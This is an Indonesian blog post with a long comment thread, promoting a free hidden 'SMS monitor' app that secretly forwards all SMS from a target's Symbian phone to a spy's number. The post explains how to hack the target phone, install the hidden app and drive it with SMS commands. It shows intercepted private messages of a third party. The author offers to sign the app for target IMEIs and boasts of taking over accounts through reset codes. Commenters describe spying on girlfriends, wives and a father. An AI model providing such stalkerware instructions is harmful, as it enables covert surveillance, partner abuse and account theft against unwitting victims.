Sadap Sms Untuk S60v3 s60v5

August122010
Test N73(hacked)

Akirnya janjiku aku tepati sudah.
Jujur.. Aplikasi yang satu ini bikin aku tambah sibuk jg bikin tambah boros pulsa.
Bukan karena aplikasinya, tapi karena banyaknya sms masuk yg menginginkan aplikasi ini. Maaf bagi teman2 yg sms'nya tdk trbalas dari aku, mhon di maklumi. Sebagai gantinya telah aku tepati janjiku untuk mengulasnya di sini

Nama aplikasi ini SMS monitor, fungsi dari aplikasi ini adalah mentransfer semua aktifitas sms masuk dan sms keluar dari ponsel target ke nomor kamu (penyadap).
Aplikasi ini bekerja pada pada ponsel s60v3 dan s60v5, jika ponsel yang mau di sadap bukan type tersebut mendingan urungkan niat untuk bisa menyadap sms'nya.

aplikasi ini diberikan gratis, kamu bisa menikmati aplikasi tanpa dipungut biaya, sayangnya aplikasi ini masih unsigned.
Disinilah letak kesulitan untuk menginstal aplikasi ini di ponsel target. Karena aplikasi ini bisa di instal di ponsel target jika ponsel target sudah mensigned aplikasi ini, tapi ada cara gampang agar aplikasi ini bisa di instal di ponsel target, yaitu dengan meng hack ponsel target, menghack ponsel symbian bukanlah pekerja'an yg sulit, terbukti hack ponsel symbian yang saya lakukan di ponsel target cuma membutuhkan waktu kurang dari 1 menit. Untuk lebih jelasnya silahkan baca cara menghack ponsel symbian s60v3 dengan hellocarbidedisini

Ingat..aku bisa hack ponsel target dng waktu kurang dari 1 menit, dari situ sudah jelas ketahuan klo menghack ponsel symbian bukanlah pekerja'an yg sulit.

Jika urusan hack meng hack sdh bisa kamu lakukan, sekarang kita bahas tentang cara pengguna'an aplikasi ini.

1. Siapkan 2 ponsel, satu ponsel kamu (sebagai penyadap), dan satunya ponsel target (yang di sadap), yg tentunya sudah kamu hack.
Ponsel target harus symbian v3 atau v5, sedang ponsel kamu (penyadap) bisa type apa aja, bahkan ponsel yg masih hitam putih pun jg bisa.

2. Selanjutnya instal aplikasi SMSmonitor ke ponsel target, tenang aja.. Aplikasi ini sifatnya hidden/sembunyi, jadi tidak akan muncul di ponsel target sehingga pemilik ponsel tidak tahu klo ponselnya telah di pasang aplikasi penyadap.

3. Jika penginstalan sudah selesai, selanjutnya melakukan pengaktifan aplikasi tersebut dengan cara mengirim sms ke ponsel target
Isi sms sebagai berikut:
Ketik Set admin 081329144XXX terus kirim ke ponsel target.
Catatan:
Nomor 081329144XXX adalah nomor kamu/penyadap, artinya semua sms masuk dan keluar di ponsel target secara otomatis akan dikirim ke nomor 081329144XXX. Silahkan ganti nomor tersebut dengan nomor kamu.

Sekarang kamu coba sms ke ponsel target pake sembarang nomor, selang beberapa menit, sms yg kamu kirimkan ke ponsel target tadi akan dikirim balik ke nomor yg telah kamu jadikan penyadap tadi.

Contoh gambar aktifitas sms yg telah berhasil aku sadap

Gambar 1
image

gambar di atas ponsel yg aku sadap sedang melakukan sms ke nomor 0857251XXXXX, yg isinya " Maap mas aq tdk bisa. Aq mhon jng sms lgi. Besok aq udh di antar ma mas ryan
To:+62857251XXXXX "

Gambar 2
image

Gambar di atas ponsel yg aku sadap mendapat sms dari 0857251XXXXX, yang isinya " Plizz ak mhon vy, ak pngen ktemu km skali ini aja. Ak mhon..
Fr:+62857251XXXXX "


Waow...! Menyenangkan bukan biggrin. Kita jadi tau semua aktifitas sms masuk dan keluar di ponsel target tanpa diketahui ama pemilik ponselnya.

(mudah2an pemilik ponsel yg telah aku sadap ini tidak membuka dan membac postinganku ini, kalau sampe tahu ntar bisa gawat.. biggrin)

Berikut ini panduan2 laen untuk mengoperasikan aplikasi tersebut.
Off : Untuk menghentikan sementara penyadapan
On : Mengaktifkan lagi penyadapan
Add sender +628132XXXXXXX, +628572XXXXXXX : Untuk menyadap aktifitas sms dari dan ke nomer tertentu saja.
Add : Untuk kembali menyadap semua nomer ponsel tanpa terkecuali.
Block on : Untuk memblok semua aktifitas telpon masuk dan keluar yang disadap.
Block off : Untuk mematikan blokir telpon diatas .

Kirimkan kode2 di atas melalui sms ke ponsel target

Gimana plend, Apa kamu tertarik untuk mencobanya??
Langsung download aplikasinya disini.

Alternatif laen selain pake SMSmonitor kamu bisa pake sms anywhere, aplikasi ini sudah signed, tapi aplikasi ini berbayar, kamu akan di beri masa coba beberapa hari, setelah itu kamu di haruskan mengeluarkan beberapa dolar untuk membelinya, untuk download silahkan cari di google, sebenarnya dulu aku juga pernah punya aplikasi sms anywhere, tapi terlanjur aku hapus. Mahal sih... biggrin.

Janjiku udah aku tepati, so.. Sms request aplikasi sadap sms aku TUTUP.. ! Thankeyu..

Mohon gunakan aplikasi SMSmonitar dengan bijak, segala dampak negatif karena penyalah guna'an bukan tanggung jawab saya.

Artikel ini bebas di copy paste oleh siapa saja , dan saya tidak melarangnya asal di postingan tidak berbau penyalah guna'an aplikasi ini
Bagikan ke Facebook Bagikan ke Twitter

Komentar

170 tanggapan untuk "Sadap Sms Untuk S60v3 s60v5"

Stwn pada 11:53 AM, 12-Aug-10

Info'a top. Nuhun atuh kang..

Dani cell pada 04:00 PM, 12-Aug-10

Om w bisa request cert n key di opda g? Hp w N81. W dah coba dftr di opda tp gagal trus.

Ryan pada 05:38 PM, 12-Aug-10

Hp km sudh di hack blm? Klo sudah ,ga prlu mnsigned pke freesigned dan cer key dr opda. smua app unsigned bs di instal koq untk hp yg sudah di hack

Ryan pada 05:39 PM, 12-Aug-10

Hp km sudh di hack blm? Klo sudah ,ga prlu mnsigned pke freesigned dan cer key dr opda. smua app unsigned bs di instal koq untk hp yg sudah di hack

Roland pada 08:03 PM, 13-Aug-10

Mksh bos akirnya di share jg,, biggrin berarti hp yg aq gunakan bs type apa aja dong.

Ryan pada 02:24 AM, 15-Aug-10

@mbah buyut nyampe sini jg, gmna?cewek km slingku ga?biggrin
@roland , betul bngt.. Hp jadul pun jg bisa, kan cm buat trima transfer sms dr hp target,
@stwn. Mksh atas knjunganya

Tricker pada 05:43 PM, 16-Aug-10

Gan cara hack 5500 gimana? Apa sama dng cara yg qm postingkn?

Ryan pada 06:24 PM, 16-Aug-10

@tricker. Klo km hack pke hellocarbide maka jawabnya iya sama.

kiky pada 10:53 PM, 16-Aug-10

bro brarti qta cma pasang aplikasinya k hp target doank yaaaa?????
jika target mempunyai no hp 3 macam apa qta krim smua k no itu biar qta g terkecoh????
oy aku baca artikel pnya orang tntang app ini dia jual 3 juta bosss n appnya msh prabayar???
wkwkwkwkwk mencari untung tu orang...heheheheheh
thanks bosssss dh share appnya...xixixixixi

Yoyox pada 11:24 AM, 17-Aug-10

Mas ada cra lain tdk slain hack hp target, coz hp tmen aq typenya beda, aq jd ksulitan utk menginstaln'a.

Ryan pada 11:59 AM, 17-Aug-10

@kiky, wlo dia gonta ganti nomor asl tetap pke ponsel yg sdh km sadap, itu sama skali ga ngaruh, kan yg di ksih pnyadap ponselnya, bukan nomornya. Biarpun dia gnti nmor jk tetap gunakan hp yg tlh dsdap, tetap aja smua sms'nya akn dtrnsfer knmor km. Untk yg jual app biarkan aja plend,, itu hak dia koq, cm klo ada yg nekat memblinya, brarti orng itu o'on biggrin

Ryan pada 12:02 PM, 17-Aug-10

Ups jd lupa jwb prtnya'an dr @yoyox. Ada cra laen koq slaen hack hp trget, kbetulan aku mau share jg, jd tnggu aja ya. Cranya dng mnsigned aplikasi pnyadap itu dr hp target.

Asep Ribadi pada 08:55 AM, 18-Aug-10

wah baru tau saya, makasih infonya, aku coba dulu ah....

Ryan pada 12:42 PM, 18-Aug-10

Mksh asep atas knjunganya. Buat tmen2 yg laen jk mrasa ksulitan untk instal di hp target bs hbungi aku lngsung, syratnya kirimkan imei hp target ke aku, biar nti aq signed dr hp aku.

Ryan pada 12:42 PM, 18-Aug-10

Mksh asep atas knjunganya. Buat tmen2 yg laen jk mrasa ksulitan untk instal di hp target bs hbungi aku lngsung, syratnya kirimkan imei hp target ke aku, biar nti aq signed dr hp aku.

kiky pada 12:02 AM, 19-Aug-10

wkwkwkwkwkwk oke klo bgtu coyyyyy....
ntr aku praktekin d hp bokap aku coyyy jd klo dy slingkuh w pnya buktinya coyyy.....wkwkwkwkw
bnyak manfaatnya nch aplikasi yg 1 ini????hahahaha

Ryan pada 01:37 AM, 19-Aug-10

Nah itu baru pengguna'an yg positif.. biggrin

kicker-btnan pada 05:10 AM, 19-Aug-10

g pnah ol kayae mz gmn,aq pgn sharing

Ryan pada 06:23 AM, 19-Aug-10

Iya neh, aku jrang ol. Ntar deh aku psti ol, biasa ol jam 9 mlam.

Ryan pada 08:18 PM, 25-Aug-10

Sblumnya minta maaf jk app sadap sms tdk bekerja.
trimaksih kpd tman2 yg telah membri informasi kalau app sadap sms tdk bkerja.
Sekarang telah aku perbarui dan silahkan download kmbli,

kiky pada 09:45 PM, 26-Aug-10

maaff boss aku blum sempet coba app yg 1 ni cz kendala hp korban lum ada...hihihih
ntr aku praktekin k hp aku sndri dchhh.....
makasih bos klo appnya udah d perbarui lg.....hehehedhe
web site yg kmaren d bkin tu knpa g prnah d kelola bos???

Ryan pada 10:59 PM, 26-Aug-10

Dlu ada 6orng yg mngeluh app tdk bkrja, stlh ak slidiki trnyta emang ada kesalahan, tp skrng udah ak gnti.

Dessy Hastiarto pada 09:01 AM, 27-Aug-10

met kenal bos ... hp n. 5320EM udah di install sesuai petunjuk tapi belum ada reaksi ... kira2 apa yg salah ya ato krn seri hp ndak ada di daftar ... urgent bos ... trims

Ryan pada 11:56 AM, 27-Aug-10

5320em itu trmsuk vrsi brpa? App itu cm bkrja pd s60v3 dan v5

Rapekan pada 06:13 PM, 27-Aug-10

Bro untk brhnti in sms sadap gmana cranya?

Ryan pada 06:52 PM, 27-Aug-10

Ketik [color=orange]Off[/color] kirim ke hp target

Nizariuz pada 07:36 PM, 30-Aug-10

Mf .. Sya sudah download SMS Monitor lwat m.getjar.com .. Lncar untk di instal .. Tp sya bngung cara pake'y .. Hape sya 5320 (s60 v3) ..

Scra garis besar aplikasi ini mesti ad dhape korban n hape sya yg sma2 s60v3 .. Kalo ga sma ga bsa.. Gt ya kak?

Ryan pada 08:25 PM, 30-Aug-10

@nizarius. App yg km dptkn dr getjar itu brbayar, utk dpt kode lisensinya dwjibkan membli shrga 62,39 dolar, sblm km dptkn kodenya, app itu tdk brfungsi.
Cara penggunaanya sama ama yg aku sebutkn di atas

piul pada 11:43 PM, 31-Aug-10

maap boss klo request cer & key bisa g??

Ryan pada 03:06 AM, 01-Sep-10

@piul, ak bs bntu, tp cer key bukan dr opda, klo km ingn mensigned app itu imei yg km brikan jng imei hp km, tp imei hp target, utk proses mensigned bs lewat hp km.

Kriwil pada 03:41 PM, 02-Sep-10

Nyasar kesini coz ngeklik link dr sebuah forum biggrin mantap maz, biarpun saya lum download apa2 dr sini (tp nti pst download) tp info2 & aplikasi mas bener2 bikin takjub

Kriwil pada 03:46 PM, 02-Sep-10

Btw OPDA mang lg error mas, jd kayaknya mang sementara gak bs request key n cert dr situ. Coba aja pake imobile

Ryan pada 05:54 PM, 02-Sep-10

Thankeyu @kriwil atas infonya tntang opda. Mksh jg udh brkunjung..

Pedro belajar jadi hycker pada 12:21 PM, 05-Sep-10

Boss tpi sayang ya cuma bisa di pke di hp berbasis s60 v3 & v5.coba klo bsa di pake di semua jenis hp,yg pasti lebih asik lagi tu boss hheheeheheh.good job boss thx app nya dah sya sedot biggrin

Ryan pada 01:43 PM, 05-Sep-10

biggrin iya nih cm buat s60v3/v5. Oh iya.. Dng app di atas ak bs hack acount seseorang yg forgot paswordnya dkrim lewt sms, kya acount mig33 biggrin

ekosemut pada 04:35 PM, 05-Sep-10

sep kang aplikasinya... smile

kalo ada waktu kunjungi blog q juga kang mysymbians60v3.blogspot.com

Ryan pada 06:38 PM, 05-Sep-10

Oke eko, aku lngsung datang

jasson pada 09:06 PM, 05-Sep-10

bro , makasih byk. aq br msk sini hr ini, tyus dwnld n app langsung jalan. tengkyu & bravo tuk ni blog

Pedro belajar jadi hycker pada 06:26 PM, 06-Sep-10

Oc lah boss,waduh gawat euy :S biggrin

Pedro belajar jadi hycker pada 09:27 AM, 07-Sep-10

Boss pnya app pemutar all format video kaya >>(july player full version) or >>(core player) yg suport buat s60v5, ada app july player suport ma hp Q tapi sayang trial boss,ada core player editan Sv5 not work di hp Sv5.padahal tu app keren bgt!! upload in dong boss klo pnya!! Heheheheheh thx be4 smile

abarai pada 09:31 PM, 07-Sep-10

Mas ryan hp q n73 kog g bsa nyari cer n key nya loading mulu g nyantol,gmna mas bantuin dunk mas?

Plizzzz

Ryan pada 11:42 PM, 07-Sep-10

@pedro. Aku coba bntu cri yg udh cracked.
@abrai, ak mnyimpulkan mslh trletak pd firmware. Kmrin ak dh coba buktikan pd 2 hp N73
hp 1: Fw 3.0638.0.0.1
hp2: Fw 4.0850.43.01
dan trnyta yg bisa pd hp2.

Pedro belajar jadi hycker pada 01:46 AM, 08-Sep-10

Oc boss di tunggu! Thx be4 boss smile

abarai pada 09:16 AM, 08-Sep-10

Itu kode apa mas?

Terus kalo engga bisa,tetep pake xstevedore?


Terus mas?

abarai pada 02:10 PM, 08-Sep-10

Sama mau tanya lagi mas punya app smart setting yg engga trial g ?


Kalau cri cer n key lwt s60certkey.com lama g mas?

Ryan pada 02:39 PM, 08-Sep-10

Yg di atas tu vrsi firmware hp, ngeceknya tekan *#0000# pd mode stanby. Smart seting aku punya tp tnggu aja untk di tmpilkan. Saat ini solusi request cer key di http://s60certkey.com

abarai pada 04:50 PM, 08-Sep-10

Pnyaku v 40736321 tu bisa g?

Iy udah request d s60certkey.com ,starusnya masih pending . . .

Pedro belajar jadi hycker pada 07:13 PM, 08-Sep-10

Boss kumaha app july pleyer creked & core player s60v5 nya,uadah ada blm??? Hehehehehehehe smile

Doink pada 01:37 PM, 14-Sep-10

Boss, hp cewe q gk bs install... tolong dong dihack buat aq... IMEI hp dia 352009044475783... Thanks ya boss atas bantuan'x smile

Doink pada 02:13 PM, 14-Sep-10

Owh iya boss, biasa'x low ada penyakit pasti ada obat'x jg... Nah ada gk boss aplikasi anti sadap sms? Maklumlah yg nama'x qta cowo pasti mau menang trus wink

Ryan pada 05:29 PM, 14-Sep-10

Obatnya apa ya? ? Jd bingung sndri, cek aja pa mnager aplikasi brangkali ada app laen yg di instal tman tnpa spengetauan km,
untk request cer key udh ga bs. Thanks

Doink pada 07:49 PM, 14-Sep-10

Oke boss! Andai ada aplikasi sadap sms s60v3 yg sdh signed, jdi biar hp cewe q belum d'hack jdi langsung bisa install... Ada gk ya sad

Pedro belajar jadi hycker pada 07:46 PM, 15-Sep-10

Wah kaya nya ga ada ya app rikwes aqu ya boss??? Ya dah gpp tq bgt boss sad smile

Ryan pada 08:32 PM, 15-Sep-10

Sory pedro, ak dh nemuin yg craked, tp bukan bhsa inggris / indo. Jd bingung gunainya, ntar klo nemu yg englis aku share, tp ga janji dulu ya biggrin

Pedro belajar jadi hycker pada 08:47 PM, 16-Sep-10

Owh ya udah gpp boss,emang aga susah cari" yg craced mah.apa lgi gratisan,maklum lah lebih enteng nyedot yg gratisan mah,tanpa beban!! Wkwkwkwkwk biggrin thx boss

dave pada 01:21 PM, 18-Sep-10

gmana kalo mms gan...?
apa di forward juga ke hp penyadap..?

Ryan pada 01:30 PM, 18-Sep-10

Slama ni blm prnah coba untk mms, tp ak rasa tdk di foward, kecuali klo mms itu gagal kdownload, biasanya kan dkrin kode download lewat sms

sumar pada 01:17 AM, 22-Sep-10

wach wes kadar luarsoo cah

aldy pada 06:03 PM, 23-Sep-10

duh syang bgt yah ,cuma bsa d pke d s60V3 nd v3 doang. .
Hupt.

uchiex jhie pada 02:19 PM, 27-Sep-10

cba dlu kang. Mdah2an mujarab ilmux, brtapa dmana kang

Yuja pada 12:59 PM, 02-Oct-10

bos,kalo ada sms di hp korban,kan lngsung di krm ke hape ku,trus biaya kirimnya siapa yg nanggung?
Apakah gratis?

Indrakindz pada 10:14 AM, 03-Oct-10

Mantap gan aplikasi,, thanks banget..
semua aktifitas sms keluar masuk cewe w akhir,n bisa di sadap.. dan terbukti tidak selingkuk.. hahahaa..
thanks ya gan..

AJI D'OTPIC pada 01:58 PM, 03-Oct-10

yuja/
ini yang di sayangkan, biaya sms di kenakan untuk si target,bisa gaswat klo tau2 pulsa si target maen kepotong terus buat auto forward ke nomer kita sang penyadap,
klo dia curuga si target bisa aja kan mengecek history pengiriman pesan via call center. Trus ketahuan deh nomer kita. satu lagi, kasian juga klo yg kita sadap tu pacar kita,bisa abis terus pulsanya buat auto forward ke no hp kita, yah kecuali dia anak pejabat yang saldo pulsanya ga bakal abis2 sampe jamuran,kwkwkw

Indra//
sukses broo,
asal jangan lupa isiin lagi tu pulsa cwe lo buat ganti biaya sms forward ke hp lo. Hahaha.

Ryan pada 10:25 PM, 04-Oct-10

Emang iya seh, tp kan skrng hmpir smua operator udh mnyediakan bonus sms, bhkan bnyk yg ga bs menghbiskan bonus itu, misal aja AXIS, bonus ampe 10ribu sms. jadi itung2 bntu mnghabiskanya. Ga bakalan tahu deh.

agus pada 09:35 PM, 07-Oct-10

maseh byum ngerti neh aq
yg udah pernah coba ajarin dong mas

aldi pada 08:04 AM, 10-Oct-10

Gk tau q caranya kurang jelas dn sulit

indrakindz pada 12:09 PM, 12-Oct-10

tenang gan masalah pulsa mah ga usah khawatir dia pake kartu xl 1 minggu 1000 sms..
Aman kan,,heheee...

Oh iya gan ada aplikasi untuk nyadap telepon ga??
Masih untuk ngintai sang pacar..
Pngen masti,in lg aja kalo w ga salah pilih cewe..
Heheee....
Sukses ya gan..

radie pada 05:43 PM, 12-Oct-10

mas ada aplikasi buat nambah memory external g? ..hp q 6210 classic ..krim k'email q ya ..thnk's

Bayu pada 09:11 PM, 14-Oct-10

Hp target ku n73 udah di hack. Aplikasi sms monitor udah berjalan normal, cuman setelah hari ke3 ada laporan terkirim di hp target ke hp penyadap. Jadinya ketahuan yg nyadap, kemudian eror hrs di instal ulang baru mau jalan. Apanya yg salah ya...? Reques aplikasi perekam telpun msk dan keluar dong mas. thanks......

Ryan pada 11:39 PM, 14-Oct-10

Namanya jg app cracked, jd ga lepas dr bugs. biggrin

iskandar fuzi pada 12:27 PM, 19-Oct-10

mantap,klau kita mau instal pakek imei gmn ya,minta tolong dijelasin kpd saya melalui email saya atau no hp saya:085360076666,uang minum pasti dikasih...hehehehe

iskandar fauzi pada 04:55 PM, 19-Oct-10

bos,saya udah install tp gagal,katanya:penyuplai apliksi tdk terpercaya,padahal saya pakai E71,mohon petunjuk Dan,klau tdk saya sangat kecewa

Nandy pada 06:23 PM, 20-Oct-10

Maz rian ..quwmu tanya...bgaimana cra menghapus aplikasi sadap sms ne...soalnya awalnya quwmu cb pakek sms ne buat nyadap hp istriq..eh mlh skrng hp quw diminta tukeran..sm ja bunuh diri,hehehe
Quw dah hpus lwat file menejer..tp stiap hp di matiin.n di hdupkan kembali pasti link donlod aplikasi ini slalu muncul...mhon keterangannya

hadi pada 10:50 AM, 25-Oct-10

mas........aplikasinya jalan trus ga...apa cm beberapa hr aja.....

Kecilung pada 08:25 PM, 27-Oct-10

Mas,q dah instal aplikasinya tp ngga mau muncul aplikasinya. .gmna . .dong tlong solusinya. .

Ryan pada 12:20 AM, 28-Oct-10

Ya emang ga muncul icon app nya, klo muncul ntar yg punya hp jd tahu donk.

apem pada 07:14 PM, 28-Oct-10

Bbrp wkt yg lalu uda tak cb hp 6120c ku pake hcarbide tp ga2l T_T, aq uda ngikuti cara2nya sedetil2nya. sampe skrg ada fitur2 hp q yg eror, kyk format default video jd mp4 ga bs di ganti, ga bs ngedit video, pokokx ngantem gallery lah. Uda tak hard reset msh tetep. TOLOOOOOOONG...

nice well done pada 07:48 PM, 29-Oct-10

Good day!This was a really exceptional website!
I come from itlay, I was fortunate to find your topic in digg
Also I learn a lot in your blog really thank your very much i will come daily

Son pada 06:37 PM, 04-Nov-10

Gan,udh dicoba tp agak ribet ni di Hp bini, doi pake nokia e63. bantuin Gan..! tks. mau kirim nomer imeinya tp gmn caranya, lwt apa ni

Ryan pada 12:16 AM, 05-Nov-10

krim lewat sms aja. Utk nope klik aja tulisan callme di bgian bwah blog ini

pedro belajar jadi hyker pada 06:56 AM, 13-Nov-10

boz mau tnya ni! tau blog indo khusus hp N900 ga?? cz Q masi butuh bnyak pencerahan wat hp N900.klo symbian ci blog virgo is the best.tq be4 bos.

Sofyan pada 01:02 PM, 13-Nov-10

Gan,sori tanya lg nih, install udh ok,ketik set admin jg ud, trs aku coba, ga bs2. apa stlh ketik set admin krm ke nome target diterusin ketik on krm ke nomr target gtu Gan? btw mau kirim no emai aja nanti gan klo gagal2 trs, tolong dibantuuuu...!! tks Gan

cabby pada 09:23 PM, 13-Nov-10

mas gmana caranya ngapus tu aplikasi???

pedro belajar jadi hycker pada 09:39 PM, 13-Nov-10

@SOFYAN:ketik: set(spasi)admin(spasi)no kamu(buat spy target) kirim ke no target.
@CABBY: klo buat stop ketik: OFF kirim ke no target.tapi klo mau ngapus total!? buka seting/file terinstall.lalu cari tu app smsmonitor trs dellete.maap boss mendahului.tau lebih lengkap tanya boss ryan.smoga membantu.tq smile

Ryan pada 11:04 PM, 13-Nov-10

tq pedro.. Sipp deh. biggrin

pedro belajar jadi hycker pada 12:10 AM, 14-Nov-10

sama" boss!!! jdi ga enak mendahului & sotoy.pi semoga bnr & membantu.tq ilmunya boss smile

sofyan pada 10:27 AM, 14-Nov-10

Gan,udh aku ketik sesuai anjuran,tp di coba kok ga kesadap jg Gan..!!

pedro belajar jadi hycker pada 12:53 PM, 15-Nov-10

@sofyan: wah masa si boss ga bsa???? emang pke hp apa?? sorry!! cz Q selama ini ga ada masalah tu pke ni app & gampang ngoprasiinnya.coba di simak dgn teliti lgi boss kali aj ada yg salah!! klo masi ga bsa jga Q ga tau tu da yg slh dimna.apa di ni app or di hp bos.piss

Dimmy pada 01:17 PM, 17-Nov-10

Bang Ryan, kok aplikasi sadap smsnya gak bisa di instal di hp saya, hp saya nokia n73 me., tolong bantuannya...

pedro belajar jadi hycker pada 06:25 AM, 18-Nov-10

@Dimmy: udah di hack belum hp nya? cz ni app masih unsignet,jadi perlu hp yg udah di hack.moga membant.sorry ambil alih ni bos ryan smile

samson pada 09:47 PM, 21-Nov-10

Gan..aku coba ni sopwer en bisa dipake, thanks..bisa gak dipake untuk 3 hp target dan penerimanya 1 hp coz saya coba tpi yg tersadap cuma target pertama saja, hp kedua dan ketiga gak tersadap, apakah 1 target hrs 1 hp penyadap? thanks infonya

Sofyan pada 01:15 PM, 01-Dec-10

mas pedro,hp target nokia e63. gmn nih gagal maning gagal maning pdhl ud ke install

brexelle hacker pada 07:23 PM, 01-Dec-10

sayang sekali y ni aplikasi cuma bisa buat symbian coba lo versi javanya ada pasti asyik tuch

medio poetra pada 11:11 PM, 02-Dec-10

hahahaha
makasih banget mas tas aplikasi nya
biggrin
smuanya kren2 loh n sangat brguna buat ku
smile
oya ada aplikasi pengunci aplikasi buat s60v5 g mas?

adi pada 08:32 PM, 03-Dec-10

buset gokil amat nih aplikasi

ibhenk pada 09:06 PM, 08-Dec-10

bos q m0 tny ni.. Dngn app xplore ko g bs di bk file sys nya knpa y ?jadi g bs mngextrac ke sys/bin
Hp q 6120c txs

Anshary pada 03:48 PM, 12-Dec-10

Add sender +628132XXXXXXX, +628572XXXXXXX

mksdnya ap nih..??
yg mna penyadap,,
and yg mna yg disadap..??

ebhji pada 12:12 PM, 21-Dec-10

mantap berhasil mas,, thanks aplikasinya tp kok waktu aku off gak berhasil mas,, masih tetap terkirim sms dari ponsel target,, gimana nih,, mas,, untuk non aktifkannya thanks infonya

Dodo pada 12:34 PM, 28-Dec-10

gan gimana cara ngehack hp nokia 6680 biar bisa diinstall aplikasi sadap sms ini. Mohon pencerahannya

intai pada 10:57 PM, 28-Dec-10

mas ryan smua berjalan dg lancar v kok pd hp target log ny keliatan....kira2 ad gx aplikasi crack yg tdk terdedeksi di hp log target.....

putra pada 10:27 PM, 04-Jan-11

applikasi ini emang keren abis dan semua berjalan lancar tapi masih banyak kekuranganya, antara lain 1. log nya terlihat sangat jelas, 2. berita terkirim/ laporan pengirimannya juga terlihat.
gagal deh proses spy istri saya... kira kira bisa diperbaiki gak bang admin applikasinya, saya tunggu balasanya via email saya, thanks

zikri pada 05:48 PM, 05-Jan-11

bang,, uniinstall sms monitornya gmn??gk sengaja nih mlah kepasang di hp sendiri,,swt,,haha,,dimohon jawabannya secepatnya

Indra pada 05:56 PM, 30-Jan-11

Zikri: langsung aja ke manager aplikasi sob.. cari nama sms monitor n hapus.. beres deh.. hehheee...


oh iya untuk agan ryan,,punya aplikasi untuk sadap tlp ga?? heee

pecks pada 04:14 PM, 13-Feb-11

aku instal di 5700 dah sukses, tapi kok lum bisa di sadap yah????

aigun pada 12:06 AM, 15-Feb-11

makasih bos applnya.. bs jln. tp kok dh lewat 3 hari tdk jln lg. bisa jln klo di sms perintah (set admin ...) lg N anakku matikan hp dulu, klo dihidupkan fowardnya cuma 6 sms ja.
knapa ya bos.. pa mang bgitu. tlong klo da yg jln trus gt..

bob pada 11:50 PM, 23-Feb-11

mas rian... Tolong mas cariin aplikasi sadap sms yg untk java... Makasih..

whana24 pada 07:32 PM, 03-Mar-11

mas ak udh brhasil instal di target tp knp tiap sms yg dkrim ke ak tdk trsmpn di pesan trkirim di hp target

ariz pada 11:13 PM, 03-Mar-11

yg laen ad g?luw mu sadap pi yg disadap jauh tmpatny gmn?g bs ktmu gt??yg dr hp qt j gt bs g??

Barok pada 11:44 AM, 22-Mar-11

e. . . . .anu. . . . .
Boz, tolong disediain daftar isi dong, biar lebih gampang cari infonya
Thank's

Abhie pada 03:08 AM, 25-Mar-11

SaLam knL . .
Mf sbLm'x,,
Saya mau tanya dunk mas,,
KLo hp nokia C3 bs instaL app sadap sms gag mas ????
Mkch sbLum'x . .

chriz pada 12:10 AM, 27-Mar-11

gan saya udah instal ke hp target tp ko gak jlan ya.ahp target n73.hp ku java.padahal aku udah kirim Set admin nomer ku.tapi ko gak jalan ya.tolong bgt ya bantuannya.

pgntau pada 04:53 PM, 07-Apr-11

mas,
Walau blom nyoba
Ok dehh lol
Tp,
Tolong hack HP pcar sya
IMEI nya 35342204541982,
Plisss
Ok mas ? biggrin

iwak pada 03:33 PM, 19-Apr-11

gan , untuk menghentikan ni apps gimana,doLong dengan sangaT saya di banTu .

ipync pada 08:38 PM, 03-May-11

Gan tolng ne,.ane td setting slh set adminx ntu k nomornya mantan,.pdhal yg mw d sadap dy,.cara set ulang adminnya gmn yaa,.m kl
OFF ntu d sent nomor mna??

herman pada 01:16 AM, 06-May-11

halo... Bro.. Lam knal.. Dari saya.
Gini bro, aku punya masalah, aplikasinya sudah saya downld, tapi saat mau instal kok sertivikatnya kadaluarsa, tolong bantuin saya bro.. Saya g tau tanggal aktif aplikasinya... Trimakasih sebelumnya.

Erik pada 06:09 PM, 10-May-11

Slm knl... Maap saya mau tanya' klw cra hack nokia E63,, gmna ya???

juess pada 07:36 PM, 11-May-11

mantap gan ..
Tp blum coba sih, hehe..
O ya, ap di hp qt jg hrus ada app sms monitor'y ?

Cz bxk yg dh coba msh ga bisa ?

Ane prnah pke smsanywherlite.sis, tp ga bisa ..
Moga2 ini nanti pas ane coba bisa .. biggrin

topect pada 11:53 PM, 18-May-11

kemaren coba add sender....nah kan nmer lain k block...buat aktivin penyadapan k nmer banyak lg gmn??aq coba "add" tetep g mau...

Ican pada 05:02 AM, 26-May-11

Mas rian. Smua sukses,apa nope penyadap g bleh d pke sms k yg tersadap cz stlh smua sukses.bs trus g bkerja stlah q sms pke nope pnyadap k target

Alvin pada 10:00 PM, 02-Jun-11

Mas, klo untuk nyadap tlpon ada nggak ?

pasoepati pada 09:27 PM, 10-Jun-11

makasih masta app nya biggrin
Mau tanya mas,kalo sadap smsnya tu kecuali sms dari no.ku bisa gak mas?
Jadinya yg d fwd ke no.ku tu bukan sms aku sendiri biggrin

Kupiah-buruk pada 01:08 PM, 11-Jul-11

Beeeeeuuh ryan maakin hari ,makin jahil aja ..:d .. med berkreasi ea sob

Centro pada 12:40 PM, 26-Jul-11

lam knal mas... Maaf apps dh banyak yg wa sdot. Tpi lum izin..sms monitornya Sipp bisa request..apps.. Yg bsa nerusin sms keluar G...lo da skalian sdap tlp jga..lo bsa ntar gampang wa gnti pullsa?? Sipp

dendA pada 08:40 PM, 04-Aug-11

jujur j ya sms monitor kalau di instal di hp aku kok gak bisa, padahal hpku n73

Hamdan pada 10:51 AM, 29-Sep-11

(Add : Untuk kembali menyadap semua nomer ponsel tanpa terkecuali)
yg ini Gk bisa Mas Ryan.. mhon pncerahnya. mkasi

H4nz pada 12:11 PM, 15-Oct-11

Ass..ikt nimbrung akh..tryta bwanyk jga pminat sadap menyadp eah..om ryan jd tenar nich hee..

H4nz pada 12:15 PM, 15-Oct-11

Ass..ikt nimbrung akh..tryta bwanyk jga pminat sadap menyadp eah..om ryan jd tenar nich hee..

anak baik pada 06:18 AM, 30-Oct-11

mas rian koq w cb k no target g bsa iaa coz hpnya sudah d hack.. tolong penjelasannya.. mohooonnn pleaseee sad

kh3kh3 pada 08:14 PM, 31-Oct-11

mas kok g' bida ya c6 n n97 di hack,,?? katanya aplikasi tidak didukung..tolong solusinya donk...
thank's....

helmi pada 09:28 AM, 07-Dec-11

mas ini trial ato ngk. . .

rheey pada 10:54 PM, 10-Jan-12

aduh saya tobat bro ketuan hahahaaa

dinwahyoe pada 05:28 AM, 20-Jan-12

Block on : Untuk memblok semua aktifitas telpon masuk dan keluar yang disadap.

kok itu gak bisa ya bang?

irfan lagi mencoba pada 02:12 AM, 16-Feb-12

mas ane pengen pake app ini takut cewe ane selingkuh ane jadi tau... App pencegah sakit hatinya sekalian di share mas...

